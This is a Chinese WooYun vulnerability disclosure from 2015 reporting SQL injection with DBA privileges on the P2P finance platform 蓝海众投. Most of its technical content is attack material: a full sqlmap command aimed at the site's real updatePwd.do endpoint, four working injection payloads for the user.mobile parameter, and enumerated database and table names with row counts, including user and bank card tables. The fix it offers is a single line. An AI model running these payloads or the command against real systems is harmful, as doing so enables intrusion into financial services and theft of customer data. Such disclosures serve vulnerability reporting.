当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165807

漏洞标题:P2P金融蓝海众投sql注入漏洞(泄露用户数据,dba权限)

相关厂商:蓝海众投

漏洞作者: Nelion

提交时间:2015-12-30 21:51

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

P2P金融蓝海众投sql注入漏洞(泄露用户数据,dba权限)。POST注入类型,泄露用户信息。

详细说明:

蓝海众投平台是由广东金融高新区股权交易中心管理并运营的互联网金融产品投融资平台,并于2014年8月正式上线运营。广东金融高新区股权交易中心是由广东省人民政府金融工作办公室直接主管的省级区域股权交易市场,其倾力打造的互联网金融产品投融资平台—蓝海众投,集合了强大的资源优势及金融行业浸润多年的丰富经验,致力于为广大投资者提供安全可信、诚实可靠、收益稳定的适合各阶层投资者的创新型投资理财服务。 蓝海众投平台依靠互联网金融理念,通过广东金融高新区股权交易中心提供的金融产品及服务,吸引更多全国优质项目,并培育一批合格投资者,引导民间资本参与资本市场建设。(官网介绍)
1、注入点:

sqlmap.py -u "http://www.vinvest.com.cn/updatePwd.do" 
--data "user.mobile=88952634&user.password=88952634&pwd2=88952634&
sCerifyCode=88952634&mobileCerifyCode=88952634"


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user.mobile (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: user.mobile=88952634' RLIKE (SELECT (CASE WHEN (3585=3585) THEN 88952634 ELSE 0x28 END)
) AND 'TOri'='TOri&user.password=88952634&pwd2=88952634&sCerifyCode=88952634&mobileCerifyCode=889526
34
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: user.mobile=88952634' AND (SELECT 6044 FROM(SELECT COUNT(*),CONCAT(0x717a6b6a71,(SELECT
 (ELT(6044=6044,1))),0x717a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
 x)a) AND 'zVMe'='zVMe&user.password=88952634&pwd2=88952634&sCerifyCode=88952634&mobileCerifyCode=88
952634
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: user.mobile=88952634' AND (SELECT * FROM (SELECT(SLEEP(5)))Aurh) AND 'ZNss'='ZNss&user.
password=88952634&pwd2=88952634&sCerifyCode=88952634&mobileCerifyCode=88952634
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: user.mobile=88952634' UNION ALL SELECT CONCAT(0x717a6b6a71,0x5a4e774d7648496c7074,0x717
a7a7671)-- &user.password=88952634&pwd2=88952634&sCerifyCode=88952634&mobileCerifyCode=88952634
---
[17:42:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0

漏洞证明:

2、权限及用户:

%%GDNPZ}{UED~54@9%(C7B8.png


3、所有数据库:

available databases [5]:
[*] finance
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


4、当前库是finance,所包含的表及数据量:

Database: finance
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| sys_logs            | 22411   |
| invest              | 9131    |
| sys_transaction     | 7330    |
| float_interest_info | 3419    |
| letter              | 1556    |
| `user`              | 1529    |
| holiday             | 1095    |
| insurance           | 1090    |
| prod_image          | 988     |
| bank_card           | 433     |
| float_interest_rate | 254     |
| float_apply_invest  | 240     |
| verify_code         | 159     |
| fin_product         | 148     |
| user_transaction    | 114     |
| float_ransom        | 94      |
| invest_copy         | 74      |
| float_prod_invest   | 49      |
| reservation         | 9       |
| sys_user            | 7       |
| fin_product_copy    | 4       |
| bank                | 2       |
| set_repayment       | 2       |
| sys_account         | 1       |
+---------------------+---------+


5、看一下当前库finance,user表中的一部分数据:

$IOAU}DUAHU6_JZXS@0DWXL.png

修复方案:

参数过滤

版权声明:转载请注明来源 Nelion@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝